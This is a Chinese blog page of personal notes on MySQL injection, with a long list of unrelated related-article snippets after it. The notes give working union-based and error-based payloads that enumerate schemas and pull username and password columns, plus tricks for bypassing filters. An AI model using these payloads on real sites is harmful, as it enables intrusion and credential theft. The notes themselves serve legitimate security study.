Yix1a
Yix1a

mysql注入基本语句,测试命令,命令构造

  • 命令记录

    • show databases;显示数据库名
    • show tables;显示表名
    • desc table; 显示列名及其属性
    • --+注释符
    • order by 用于对结果集进行排序
    • select 用于从表中选取数据
    • union select 用于合并两个或多个Select语句的结果集
    • concat 返回字符串连接的结果
    • concat_ws(separator,str1) 将多个字符串连接成一个字符串,但是可以一次性指定分隔符。

    • group_concat() 语法:group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc ] [separator '分隔符'] )
      mysql注入基本语句,测试命令,命令构造_第1张图片
      图片.png
    • information_schema 数据库,简单来说就是MYSQL数据库的数据库,内容是数据库自身的信息,数据库中有哪些表,哪些字段,哪些视图的信息,可以通过Information_schema的信息查询
    • version() 或@@version 版本号
    • database() 数据库名字
    • user() 数据库的权限用户
    • current_user 当前用户名
    • session_user() 连接数据库的用户名
    • @@hostname 主机名
    • @@port 数据库端口
    • @@version_compile_os 操作系统(只能查出内核,无法查出操作系统具体版本)
    • mid(), str="123456" mid(str,2,1) 结果为2
    • substr()
    • Left()
    • @@datadir 读取数据库路径
    • @@basedir MYSQL安装路径
    • and可以转为&&,or可以转为||
      • note: &&和#在url都有特殊意义,需要编码
    • distinct() 去除重复的值
    • 空格替换
      • 不同的数据库版本,不同的数据库,不同的环境,用其中某一个替换空格有可能成功。有可能不成功。
      • TAB 09 horizontal TAB-----------------url编码后就是%09
      • LF 0A newline-----------------------url编码后----%0A
      • FF 0C new page----------------------url 编码后-----%0C
      • CR 0D carriage return-----------------url 编码后------%0D
      • VT 0B vertical TAB (MySQL and Microsoft SQL Server only)------%0B
      • - A0 - (MySQL only)-----------%A0
      • $id= preg_replace('/[ +]/',"", $id);//匹配 一个或更多的空格
      • $id= preg_replace('/[\s]/',"", $id);//匹配任意的空白字符(\s)

  • 测试命令记录

    • and 1=1和id=1 and 1=2 不一样则成功构造了注入点
    • POST型的用or 1=1 #
    • id=1 order by number ,输入不同的number,测出改注入点的字段数,大于number报错,小于等于number正常。
    • order by 被过滤可以用,orDer by ,ord<>er by, ordorderer by.
    • POST型的要id=1' and 1=2 union select ....
    • 错误页面NULL+注释符被过滤测试方式
      • 1(闭合条件)and(闭合条件)1 ———— 改变前面的1,也就是2(闭合条件)and(闭合条件)1,返回页面改变则闭合条件正确,这里不能用or,因为or两侧其一为真,结果为真。
    • 注释符过滤替代
      • 构造一个不需要注释符号的方式 1(闭合条件)and(闭合条件)1 和 id=0' union select 1,2,3 and '1

  • 命令构造记录

    • 基本构造
      • 查数据库名 select group_concat(schema_name) from information_schema.schemata或select group_concat(schema_name) from information_schema.schema --+
      • 查数据库 select table_schema from information_schema.tables group by table_schema limit 0,1 --+
      • 查表名 select table_name from information_schema.tables where table_schema='数据库名'或database() --+
      • 查字段名 select column_name from information_schema.columns where table_name='当前数据库下的表名'或where table_name=database() --+
      • 查看字段的内容 select 字段名 from 表名。
    • union select 1,2,3,
      • select后面跟字段数number一样多的字符,然后让union前面为flase,即id=0或-1等其他方式,然后后面的union select将被显示,用来查询信息。note:不要在1处输入,1处经常被作为id序号,而不是信息,可能不会显示到网页中。
      • union select 1,group_concat(schema_name),3 from information_schema.schemata--+ 查看数据库
      • union select 1, table_name , version() ...Number from information_schema.tables where table_schema='数据库名' limit 0,1 --+ 查看表1
      • union select 1, table_name , version() ...Number from information_schema.tables where table_schema='数据库名' limit 1,1 --+ 查看表2
      • union select 1,group_concat(table_name),version()...Number from information_schema.tables where table_schema='数据库名' --+ 查看所有的表
      • union select 1,group_concat(column_name),version()...Number from information_schema.columns where table_name='表名' --+ 查看所有的行
      • union select 1,group_concat(username,password),version()...Number from 表名--+ 字段中的内容
      • POST 1' and 1=2 union select 1,2,3 #
    • 截断字符测试名字
      • MID((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’
      • mid,substr,left 三个函数有这个功能
    • 报错注入
      • 有概率,多试几次次啊能成功。详见https://www.jianshu.com/p/ce167362c10f
      • id=1' and (select 1 from ( select count(*),concat('!!',(select table_schema from information_schema.tables group by table_schema limit 0,1),'!!',floor(rand(0)*2))DN from information_schema.tables group by DN) a ) --+
      • id=1' and (select 1 from ( select count(*),concat('!!',(select table_name from information_schema.tables where table_schema='数据库名' limit 0,1),'!!',floor(rand(0)*2))DN from information_schema.tables group by DN) a ) --+
      • id=1' and (select 1 from ( select count(*),concat('!!',(select column_name from information_schema.columns where table_name='表名' limit 0,1),'!!',floor(rand(0)*2))DN from information_schema.tables group by DN) a ) --+
      • id=1' and (select 1 from ( select count(*),concat('!!',(select 列名 from 数据库.表名 limit 0,1),'!!',floor(rand(0)*2))DN from information_schema.tables group by DN) a ) --+
      • POST型示例 1' and (select 1 from (select count(*),concat('::',(select schema_name from information_schema.schemata limit 0,1),'::',floor(rand(0)*2))x from information_schema.tables group by x) a ) # 1'后面的and也行or也行,不明原因。
    • extractvalue()和updatexml()的报错注入
      • id=1' and extractvalue(1,concat((select version() )))
      • extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用函数截取,一次查看32位 ,mid(select database(),1,32)
      • id=1‘ and updatexml('anything',concat('~',(select version())),'anything')) 也是32位。
    • 以可运行database()情况下绕过 ' " 等过滤
      • 要执行的语句where = (能当作文本的语句,而不是字符串,因为字符串要加'和")
    • 逗号过滤绕过
      • select 1,2 就类似于 select * from (select 1)a join (select 2)b

你可能感兴趣的:(mysql注入基本语句,测试命令,命令构造)

  • mysql数据库底层逻辑
    一、数据加载在MySQL中,数据持久化存储在磁盘上,但为了高效访问,MySQL会智能地将数据加载到内存中。Mysql在内存中构建缓冲池,当查询需要访问数据时,MySQL首先检查缓冲池,若数据不在缓冲池:1.从磁盘读取目标页(16KB单位)2.将页加载到缓冲池的空闲页(FreeList)3.将页添加到LRUList的OldSublist头部(LRU分为两个区域:NewSublist(5/8):最近频
  • redis秒杀之lua脚本 stand_forever redisredislua数据库
    Lua脚本核心原理:1.单线程模型:Redis使用单线程处理命令,所有命令按顺序执行。Lua脚本会被视为一个整体任务,执行期间不会被其他命令中断。2.原子性保证:将库存检查、扣减、订单记录等多个操作放在一个脚本中,会连续执行,中间不会有其他客户端操作插入。保证了脚本的原子性。3.无需锁机制:由于Redis的单线程特性,Lua脚本天然避免了并发冲突,无需额外加锁。实现流程:1.首先库存预热:活动开始
  • 游戏分析-《第五人格》 M_Yan_9cdd
    《第五人格》是网易首款非对称性对抗竞技手游。荒诞哥特画风,悬疑烧脑剧情。刺激的1V4对抗玩法,都将给玩家带来全新的游戏体验。玩家可以选择扮演监管者或求生者,展开激烈的对抗。游戏类型——可玩性竞技类游戏决定了游戏的玩法存在着对立的2方,基本上是建立在平等的对抗关系,并且存在合作的关系。但是《第五人格》是非对称性的,一方很强势但是孤军作战;一方比较缩小,多人合作,这一不对称的关系使玩家以多取胜或者以一
  • 这才是你需要了解的时序数据库 Apache-IoTDB 源码解析之系统架构! AI科学小老师
    个人博客导航页(点击右侧链接即可打开个人博客):大牛带你入门技术栈1.系统架构1.1系统简介以上示意图可能非常简单,但我觉得足够表明一个整体架构。当一台设备、一辆车连接到协议网关后,便开始了真正的收发数据。一般通信的方式都是基于tcp,搞一段二进制协议,所以协议网关基本要做的工作就是完成对连接的管理、完成对数据的收发及编解码。当数据完成编解码之后一般会发往消息队列当中,一般都是Kafka之中。用来
  • 解析:投票活动买票查得出吗,怎样才能不被发现 神州网络公司
    解析:投票活动刷票查得出吗,怎样才能不被发现这个基本上是不会查的,但是如果被人举报的话是有可能封号的哈IP地址。每一个微信投票评选活动举办的时候,主办方都会对投票和刷票有严格的控制,如果是人工投票的活动,很难被发现,但是人工刷票的话,主办方很容易通过查看刷票的时间、设备、频率、IP地址等都可以查出来。说说微信怎么刷票快,以下内容仅供参考哦:1.把投票链接分享到各个朋友圈首先最简单的就是将你要投票的
  • Linux 的解压命令 第七原色
    解压tar–xvffile.tar解压tar包tar-xzvffile.tar.gz解压tar.gztar-xjvffile.tar.bz2解压tar.bz2tar–xZvffile.tar.Z解压tar.Zunrarefile.rar解压rarunzipfile.zip解压zip
  • 时序数据库 Apache-IoTDB 源码解析之系统架构(二) zhoumouren88 技术
    上一章聊到时序数据是什么样,物联网行业中的时序数据的特点:存量数据大、新增数据多(采集频率高、设备量多)。详情请见:时序数据库Apache-IoTDB源码解析之前言(一)打一波广告,欢迎大家访问IoTDB仓库,求一波Star。这一章主要想聊一聊:物联网行业的基本系统架构,及使用数据库遇到的需求与挑战IoTDB的功能特点及系统架构车联网因为本人是在做车联网行业,所以对这个行业的信息了解更深入一些,能
  • Class15自定义层 Morning的呀 深度学习pythonpytorch开发语言
    importtorchimporttorch.nn.functionalasFfromtorchimportnn#定义类继承自nn.ModuleclassCenteredLayer(nn.Module):#构造函数def__init__(self):#调用父类构造函数super().__init__()#定义前向传播函数defforward(self,X):#每个元素减去整个张量的平均值retur
  • 常见数据编码方式的详细对比表格
    一、常见数据编码方式的详细对比表格编码名称基本原理电平数自同步能力直流平衡典型应用场景编码效率(数据位/信号单元)主要优点主要缺点曼彻斯特编码每个比特周期中间强制跳变:0(高→低),1(低→高)2是(中间跳变提供时钟)无(50%占空比,直流分量为0)早期10BASE-T以太网50%(1位/2信号单元)自同步能力强,抗干扰简单信号速率是数据速率的2倍,带宽利用率低差分曼彻斯特编码比特起始处是否跳变表
  • 通信方式与交换方式详解 两圆相切 网络规划设计师网络
    通信方式与交换方式是通信网络中的核心概念,分别定义了数据传输的基本模式(通信方向与同步机制)和网络节点间的转发策略(路径选择与资源分配)。理解两者的分类与特性,对网络设计、协议选型及性能优化至关重要。一、通信方式(CommunicationModes)通信方式描述数据在传输过程中方向性和同步性的特征,决定了终端设备间的交互模式。1.1按传输方向分类类型定义核心特性典型场景单工通信数据仅能沿单一固定
  • 晚间黄金分析 青色信物
    2021年2月4日(周四)黄金TD行情分析:黄金TD方面,日内黄金整体是震荡行情,最高测试381附近,最低测试377.15附近,止损上方黄金多单小幅度获利;日线方面收取一根实体大阴柱,布林呈现向下运行发展,MACD死叉持续放量,上方关注承压点385附近,下方支撑377;4小时线方面收取一根实体阳柱,布林向下开口发展,MACD死叉形成并递增放量,上方关注384附近;下方支撑位378;小时线方面收取一
  • 快速排序Java代码简洁实现 SKY技术修炼指南 算法
    学习过数据结构的同学们都知道,快速排序算法是一种时间复杂度为O(nlogn)的排序算法,在各种排序算法中算是较为高效的方法,企业面试中也经常有手撕快排的环节。本文将阐述算法的基本思想,并用Java代码的形式实现快速排序代码。算法思想快速排序主要采用分治的基本思想,每次将一个位置上的数据归位,此时该数左边的所有数据都比该数小,右边所有的数据都比该数大,然后递归将已归位的数据左右两边再次进行快排,从而
  • 深入理解 SemaphoreSlim 在.NET Core API 开发中的应用 爱吃香蕉的阿豪 .netcoreSemaphoreSlim线程并发控制
    目录什么是SemaphoreSlimSemaphoreSlim的核心方法构造函数等待方法释放方法基本使用模式同步使用模式异步使用模式(推荐在API中使用)在Web开发中的常见用途1.限制API接口的并发请求数2.保护共享资源的并发访问3.控制外部服务的调用频率4.实现分布式锁的本地补充注意事项与最佳实践1.确保正确释放信号量2.合理设置信号量的生命周期3.避免过度限制并发4.注意异步操作中的取消机
  • 《深入理解 Python 的对象构造机制:__new__ 与 __init__ 的本质区别与实战应用》 清水白石008 开发语言学习笔记课程教程python开发语言
    《深入理解Python的对象构造机制:new与init的本质区别与实战应用》引言:对象的诞生之谜在Python的面向对象编程中,我们习惯于使用__init__方法来初始化对象。但你是否曾注意到,还有一个鲜为人知却至关重要的魔法方法——__new__?它是对象构造过程的起点,掌控着类实例的真正创建。理解__new__与__init__的区别,不仅能帮助你掌握Python的对象模型,还能在构建不可变类
  • Django基础(七)———模型常用Field以及Meta配置
    前言上篇文章给大家介绍类Django和MySQL数据库的综合使用,以及框架中的ORM模型。这篇文章将继续讲述ORM模型当中常用的Field以及Meta配置一、模型常用Field在Django中,定义了一些Field来与数据库表中的字段类型来进行映射。以下将介绍那些常用的字段类型。1.AutoField映射到数据库中是int类型,可以有自动增长的特性。一般不需要使用这个类型,如果不指定主键,那么模型
  • mysql索引和查询优化 Itzel_yuki mysqlmysql索引mysql查询优化高性能mysql总结
    BTree索引:1、对于组合索引,如果查询中有某个列是范围查询,则其右边所有列都无法使用索引优化查询2、高性能索引,索引的列不能是表达式的一部分,也不能是函数的参数。应该养成简化where查询的习惯,始终将索引列单独放在符号的一侧。3、前缀索引和索引的选择性:在创建前缀索引时,选择选择性更丰富的前缀长度。4、mysql无法使用前缀索引做orderBy和groupby,也无法使用前缀索引做覆盖扫描。
  • junit mockito_如何学习Java中的单元测试:JUnit和Mockito课程 dfsgwe1231 单元测试编程语言python人工智能java
    junitmockito大家好,今天我将讨论JUnit和单元测试,这是任何软件开发人员的关键技能之一。您可能已经知道JUnit和Mockito是Java应用程序中最受欢迎的两个测试库,并且几乎在每个Java应用程序类路径中都可以找到它们。我经常与Java开发人员见面并一起工作,这些Java开发人员非常了解Java但还没有编写单个单元测试。当我问他们为什么不编写单元测试时,他们提出了许多借口,例如他
  • 批量插入技巧:减少事务提交次数的性能提升
    一、事务提交成本分析每次事务提交触发‌磁盘I/O同步‌(WAL机制)、‌日志写入‌和‌锁资源释放‌操作,高频独立提交会产生指数级开销‌。实验表明:MySQL提交1万次单条插入比单次批量插入‌慢20倍以上‌‌。高频提交还加剧锁竞争与死锁风险,导致事务队列膨胀‌。二、核心优化方案‌合并事务提交‌关闭自动提交(autocommit=0),单事务内完成批量操作后统一COMMIT,减少日志刷盘次数‌。示例代
  • 【EF Core】 EF Core 原生SQL查询深度解析
    文章目录前言一、基于实体的SQL语句查询1.1通过FromSql实现基于实体的SQL语句查询1.2通过FromSql实现基于实体的储存过程/视图查询1.3FromSql在底层做了些什么1.4参数化的好处1.5LINQ组合1.6FromSqlInterpolated与FromRaw二、执行非查询SQL三、查询标量(非实体)类型的SQL语句总结前言在EFCore中使用原生SQL执行查询本身不是一种常见
  • 2018-09-11 YRong_9b30
    [特训营3期2018年9月11日第十一天打卡]今天是九月十日教师节,在这里首先就是要祝储君老师教师节快乐!!好了,现在就来进入正题。今天的课程是求和函数(SUM函数)。1、基本用法:(1)快速求和:可以利用快捷键Alt+=;(2)不连续区域求和:=SUM(区域1,区域2,区域3,……);(3)利用名称框求和:选中求和区域,在名称框那命名为"求和区域"(名字根据自己需要取)=SUM(求和区域);选中
  • 系统学习图像算法Day.9——OpenCV学习——形态学滤波 敏而好学无止境 OpenCV学习图像算法
    形态学滤波定义:在我们图像处理中的形态学,往往指的时数学形态学——是一门建立在格论和拓扑学基础上的图像分析学科。形态学基本操作:膨胀、腐蚀膨胀dilate介绍:膨胀就是求局部最大值的操作。从数学角度讲,膨胀就是讲图像与核进行卷积。核与图像卷积,即计算核覆盖的区域的像素点的最大值,并把这个最大值赋值给参考点指定的像素。这样会使图像中的高亮区域逐渐增长。函数调用举例:Matimage=imread("
  • python基础语法复习04——函数 洛华363 pythonpython
    python基础语法目录python基础语法01——基本类型python基础语法02——复合类型python基础语法03——语句构成文章目录python基础语法目录一、初识函数1.定义2.调用二、函数的传参1.位置传参2.关键词传参3.参数默认值4.可变位置参数5.可变关键词参数6.参数解包7.值传递与引用传递总结一、初识函数函数是Python中可重复使用的代码块,用于执行特定任务。通过将代码封装
  • ubuntu18.04安装geemap 阿西是有梦想的咸鱼 python编程之路遥感影像处理可视化可视化pythonubuntu
    文章目录安装测试GEE提供了JavaScript和PythonAPI,可以向EarthEngine服务器发出计算请求。与GEEJavaScriptAPI相比,PythonAPI缺乏易于理解的操作文档和交互式可视化结果的功能。由此,geemap诞生并填补了这一空白[1]。这里给大家介绍下我折腾了一晚上才搞定的geemap的安装及测试过程。这里是geemap的GitHub参考链接。安装如Github中
  • conda安装geemap Prophet.Z geemapGEEcondapython深度学习
    打个卡,开始学习使用geemap网址:http://geemap.org/installation/conda安装geemap:打开Anacondaprompt终端,输入:condainstallgeemap-cconda-forge吴秋生老师建议创建一个新的conda环境来安装geemap。安装以下命令设置condaenv并按照geemap和pygis,其中包括geemap的所有可选的安装包。c
  • 《成为波伏瓦》书摘—2 书摘
    1.过一个被他人所看见的一生,还是不为他人所看见的一生更好?笛卡尔借用奥维德的话说:“想要过好自己的一生,你必须不被看见。2.站在今天往回看,我们不难发现,波伏瓦当时是陷入了一场完全针对她个人的人身攻击。有的人批判她是个失败的女性,说她背离了女性该有的样子;有的人批判她是个失败的哲学家,说她没有自己的原创性,只是在套用萨特的东西;有的人甚至批判她是一个失败的人,说她丧失了基本的道德水准。因为各种各
  • 02-C语言:第02天笔记 Star在努力 c语言笔记开发语言
    C语言:第02天笔记内容提要变量基本数据类型回顾数据类型基本类型:C语言内置整型短整型:short(2字节)基本整型:int(4字节)长整型:long(32位系统4字节/64位系统8字节)长长整型:longlong(8字节,C99新增)浮点型单精度型:float(4字节)双精度型:double(8字节)长双精度型:longdouble(如GCC通常是16字节,MSVC可能是8字节),取决于编译器。
  • 【RS】GEE(Python):大规模分析与导出数据
    在前面的章节中,我们探讨了如何在GoogleEarthEngine(GEE)上进行数据加载、处理、分析和可视化。现在,我们将进一步扩展,探索如何处理大规模的数据集和执行复杂的分析任务。通过GEE的云计算能力,用户可以在全球范围内执行大规模的时空分析,并高效地将处理结果导出为所需的格式。大规模分析的基本原则在GEE中,大规模分析是通过ImageCollection和FeatureCollection
  • 【Python篇】Python基础——08day.面向对象编程中类和对象的基本概念及属性和方法的常见分类和使用场景 WXX_s python基础篇python分类开发语言学习
    目录前言一、类和对象1.类→Class1.1概念1.2创建2.对象→Object2.1概念2.2创建二、属性和方法1.实例属性2.实例方法3.类属性4.类方法5.静态方法5.1综合应用6.构造方法7.初始化方法8.魔术方法8.1常用方法8.2案例参考总结前言这章讲的面向对象编程(Object-OrientedProgramming,简称OOP)是一种通过组织对象来设计程序的编程方法。为什么需要类和
  • 太棒了!8月最美的“熟女感穿搭”赏析在此:基本款式真给力! 泰安秋子
    夏末秋初,早晚的凉爽与正午时分的艳阳高照相互交替,形成了尴尬的时间段:穿的太多,中午就显得闷热难当;而少穿一点,一早一晚的时刻又难以抵挡住略带寒意的秋风……在这个温度高低不定的时节里,中年女性如何顺应着气温来进行穿搭,成为了每日必须思考的难题!如果,你正为此而烦恼的话,不妨参考一下下面时尚博主们的换季穿搭示范,我们可以借鉴她们的搭配实操,帮助自己轻松打造好衣品。一般情况下,女人过了40岁之后,身材
  • JUC——创建线程的方法 机器滴小白 JAVA学习笔记java开发语言JUC并发编程
    1.继承Thread类原理:通过继承Thread类并重写其run()方法,定义线程的执行逻辑。(Thread类实现了Runnable接口)调用start()方法启动线程(JVM会自动调用run())。特点简单直接,适合快速实现线程逻辑。局限性:Java是单继承的,继承Thread后无法再继承其他类。//1.继承Thread类classMyThreadextendsThread{@Overridep
  • mongodb3.03开启认证 21jhf mongodb
    下载了最新mongodb3.03版本,当使用--auth 参数命令行开启mongodb用户认证时遇到很多问题,现总结如下: (百度上搜到的基本都是老版本的,看到db.addUser的就是,请忽略) Windows下我做了一个bat文件,用来启动mongodb,命令行如下: mongod --dbpath db\data --port 27017 --directoryperdb --logp
  • 【Spark103】Task not serializable bit1129 Serializable
    Task not serializable是Spark开发过程最令人头疼的问题之一,这里记录下出现这个问题的两个实例,一个是自己遇到的,另一个是stackoverflow上看到。等有时间了再仔细探究出现Task not serialiazable的各种原因以及出现问题后如何快速定位问题的所在,至少目前阶段碰到此类问题,没有什么章法 1.   package spark.exampl
  • 你所熟知的 LRU(最近最少使用) dalan_123 java
    关于LRU这个名词在很多地方或听说,或使用,接下来看下lru缓存回收的实现 1、大体的想法     a、查询出最近最晚使用的项     b、给最近的使用的项做标记 通过使用链表就可以完成这两个操作,关于最近最少使用的项只需要返回链表的尾部;标记最近使用的项,只需要将该项移除并放置到头部,那么难点就出现 你如何能够快速在链表定位对应的该项? 这时候多
  • Javascript 跨域 周凡杨 JavaScriptjsonp跨域cross-domain
                                       
  • linux下安装apache服务器 g21121 apache
    安装apache 下载windows版本apache,下载地址:http://httpd.apache.org/download.cgi   1.windows下安装apache Windows下安装apache比较简单,注意选择路径和端口即可,这里就不再赘述了。 2.linux下安装apache: 下载之后上传到linux的相关目录,这里指定为/home/apach
  • FineReport的JS编辑框和URL地址栏语法简介 老A不折腾 finereportweb报表报表软件语法总结
      JS编辑框: 1.FineReport的js。 作为一款BS产品,browser端的JavaScript是必不可少的。 FineReport中的js是已经调用了finereport.js的。 大家知道,预览报表时,报表servlet会将cpt模板转为html,在这个html的head头部中会引入FineReport的js,这个finereport.js中包含了许多内置的fun
  • 根据STATUS信息对MySQL进行优化 墙头上一根草 status
    mysql  查看当前正在执行的操作,即正在执行的sql语句的方法为:      show processlist 命令   mysql> show global status;可以列出MySQL服务器运行各种状态值,我个人较喜欢的用法是show status like '查询值%';一、慢查询mysql> show variab
  • 我的spring学习笔记7-Spring的Bean配置文件给Bean定义别名 aijuans Spring 3
    本文介绍如何给Spring的Bean配置文件的Bean定义别名? 原始的 <bean id="business" class="onlyfun.caterpillar.device.Business"> <property name="writer"> <ref b
  • 高性能mysql 之 性能剖析 annan211 性能mysqlmysql 性能剖析剖析
    1 定义性能优化 mysql服务器性能,此处定义为 响应时间。 在解释性能优化之前,先来消除一个误解,很多人认为,性能优化就是降低cpu的利用率或者减少对资源的使用。 这是一个陷阱。 资源时用来消耗并用来工作的,所以有时候消耗更多的资源能够加快查询速度,保持cpu忙绿,这是必要的。很多时候发现 编译进了新版本的InnoDB之后,cpu利用率上升的很厉害,这并不
  • 主外键和索引唯一性约束 百合不是茶 索引唯一性约束主外键约束联机删除
    目标;第一步;创建两张表 用户表和文章表         第二步;发表文章       1,建表; ---用户表 BlogUsers --userID唯一的 --userName --pwd --sex create
  • 线程的调度 bijian1013 java多线程thread线程的调度java多线程
    1.       Java提供一个线程调度程序来监控程序中启动后进入可运行状态的所有线程。线程调度程序按照线程的优先级决定应调度哪些线程来执行。   2.       多数线程的调度是抢占式的(即我想中断程序运行就中断,不需要和将被中断的程序协商) a) 
  • 查看日志常用命令 bijian1013 linux命令unix
    一.日志查找方法,可以用通配符查某台主机上的所有服务器grep "关键字" /wls/applogs/custom-*/error.log   二.查看日志常用命令1.grep '关键字' error.log:在error.log中搜索'关键字'2.grep -C10 '关键字' error.log:显示关键字前后10行记录3.grep '关键字' error.l
  • 【持久化框架MyBatis3一】MyBatis版HelloWorld bit1129 helloworld
    MyBatis这个系列的文章,主要参考《Java Persistence with MyBatis 3》。   样例数据 本文以MySQL数据库为例,建立一个STUDENTS表,插入两条数据,然后进行单表的增删改查     CREATE TABLE STUDENTS ( stud_id int(11) NOT NULL AUTO_INCREMENT,
  • 【Hadoop十五】Hadoop Counter bit1129 hadoop
       1. 只有Map任务的Map Reduce Job File System Counters FILE: Number of bytes read=3629530 FILE: Number of bytes written=98312 FILE: Number of read operations=0 FILE: Number of lar
  • 解决Tomcat数据连接池无法释放 ronin47 tomcat 连接池 优化
    近段时间,公司的检测中心报表系统(SMC)的开发人员时不时找到我,说用户老是出现无法登录的情况。前些日子因为手头上 有Jboss集群的测试工作,发现用户不能登录时,都是在Tomcat中将这个项目Reload一下就好了,不过只是治标而已,因为大概几个小时之后又会 再次出现无法登录的情况。 今天上午,开发人员小毛又找到我,要我协助将这个问题根治一下,拖太久用户难保不投诉。 简单分析了一
  • java-75-二叉树两结点的最低共同父结点 bylijinnan java
    import java.util.LinkedList; import java.util.List; import ljn.help.*; public class BTreeLowestParentOfTwoNodes { public static void main(String[] args) { /* * node data is stored in
  • 行业垂直搜索引擎网页抓取项目 carlwu LuceneNutchHeritrixSolr
    公司有一个搜索引擎项目,希望各路高人有空来帮忙指导,谢谢! 这是详细需求: (1) 通过提供的网站地址(大概100-200个网站),网页抓取程序能不断抓取网页和其它类型的文件(如Excel、PDF、Word、ppt及zip类型),并且程序能够根据事先提供的规则,过滤掉不相干的下载内容。 (2) 程序能够搜索这些抓取的内容,并能对这些抓取文件按照油田名进行分类,然后放到服务器不同的目录中。
  • [通讯与服务]在总带宽资源没有大幅增加之前,不适宜大幅度降低资费 comsci 资源
          降低通讯服务资费,就意味着有更多的用户进入,就意味着通讯服务提供商要接待和服务更多的用户,在总体运维成本没有由于技术升级而大幅下降的情况下,这种降低资费的行为将导致每个用户的平均带宽不断下降,而享受到的服务质量也在下降,这对用户和服务商都是不利的。。。。。。。。     &nbs
  • Java时区转换及时间格式 Cwind java
    本文介绍Java API 中 Date, Calendar, TimeZone和DateFormat的使用,以及不同时区时间相互转化的方法和原理。   问题描述: 向处于不同时区的服务器发请求时需要考虑时区转换的问题。譬如,服务器位于东八区(北京时间,GMT+8:00),而身处东四区的用户想要查询当天的销售记录。则需把东四区的“今天”这个时间范围转换为服务器所在时区的时间范围。
  • readonly,只读,不可用 dashuaifu jsjspdisablereadOnlyreadOnly
    readOnly 和 readonly 不同,在做js开发时一定要注意函数大小写和jsp黄线的警告!!!我就经历过这么一件事: 使用readOnly在某些浏览器或同一浏览器不同版本有的可以实现“只读”功能,有的就不行,而且函数readOnly有黄线警告!!!就这样被折磨了不短时间!!!(期间使用过disable函数,但是发现disable函数之后后台接收不到前台的的数据!!!)  
  • LABjs、RequireJS、SeaJS 介绍 dcj3sjt126com jsWeb
    LABjs 的核心是 LAB(Loading and Blocking):Loading 指异步并行加载,Blocking 是指同步等待执行。LABjs 通过优雅的语法(script 和 wait)实现了这两大特性,核心价值是性能优化。LABjs 是一个文件加载器。RequireJS 和 SeaJS 则是模块加载器,倡导的是一种模块化开发理念,核心价值是让 JavaScript 的模块化开发变得更
  • [应用结构]入口脚本 dcj3sjt126com PHPyii2
    入口脚本 入口脚本是应用启动流程中的第一环,一个应用(不管是网页应用还是控制台应用)只有一个入口脚本。终端用户的请求通过入口脚本实例化应用并将将请求转发到应用。 Web 应用的入口脚本必须放在终端用户能够访问的目录下,通常命名为 index.php,也可以使用 Web 服务器能定位到的其他名称。 控制台应用的入口脚本一般在应用根目录下命名为 yii(后缀为.php),该文
  • haoop shell命令 eksliang hadoophadoop shell
    cat chgrp chmod chown copyFromLocal copyToLocal cp du dus expunge get getmerge ls lsr mkdir movefromLocal mv put rm rmr setrep stat tail test text
  • MultiStateView不同的状态下显示不同的界面 gundumw100 android
    只要将指定的view放在该控件里面,可以该view在不同的状态下显示不同的界面,这对ListView很有用,比如加载界面,空白界面,错误界面。而且这些见面由你指定布局,非常灵活。 PS:ListView虽然可以设置一个EmptyView,但使用起来不方便,不灵活,有点累赘。 <com.kennyc.view.MultiStateView xmlns:android=&qu
  • jQuery实现页面内锚点平滑跳转 ini JavaScripthtmljqueryhtml5css
    平时我们做导航滚动到内容都是通过锚点来做,刷的一下就直接跳到内容了,没有一丝的滚动效果,而且 url 链接最后会有“小尾巴”,就像#keleyi,今天我就介绍一款 jquery 做的滚动的特效,既可以设置滚动速度,又可以在 url 链接上没有“小尾巴”。   效果体验:http://keleyi.com/keleyi/phtml/jqtexiao/37.htmHTML文件代码: &
  • kafka offset迁移 kane_xie kafka
    在早前的kafka版本中(0.8.0),offset是被存储在zookeeper中的。   到当前版本(0.8.2)为止,kafka同时支持offset存储在zookeeper和offset manager(broker)中。   从官方的说明来看,未来offset的zookeeper存储将会被弃用。因此现有的基于kafka的项目如果今后计划保持更新的话,可以考虑在合适
  • android > 搭建 cordova 环境 mft8899 android
      1 , 安装 node.js        http://nodejs.org      node -v   查看版本   2, 安装 npm   可以先从  https://github.com/isaacs/npm/tags  下载 源码 解压到
  • java封装的比较器,比较是否全相同,获取不同字段名字 qifeifei
     非常实用的java比较器,贴上代码: import java.util.HashSet; import java.util.List; import java.util.Set; import net.sf.json.JSONArray; import net.sf.json.JSONObject; import net.sf.json.JsonConfig; i
  • 记录一些函数用法 .Aky. 位运算PHP数据库函数IP
    高手们照旧忽略。 想弄个全天朝IP段数据库,找了个今天最新更新的国内所有运营商IP段,copy到文件,用文件函数,字符串函数把玩下。分割出startIp和endIp这样格式写入.txt文件,直接用phpmyadmin导入.csv文件的形式导入。(生命在于折腾,也许你们觉得我傻X,直接下载人家弄好的导入不就可以,做自己的菜鸟,让别人去说吧) 当然用到了ip2long()函数把字符串转为整型数
  • sublime text 3 rust wudixiaotie Sublime Text
    1.sublime text 3 => install package => Rust 2.cd ~/.config/sublime-text-3/Packages 3.mkdir rust 4.git clone https://github.com/sp0/rust-style 5.cd rust-style 6.cargo build --release 7.ctrl
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他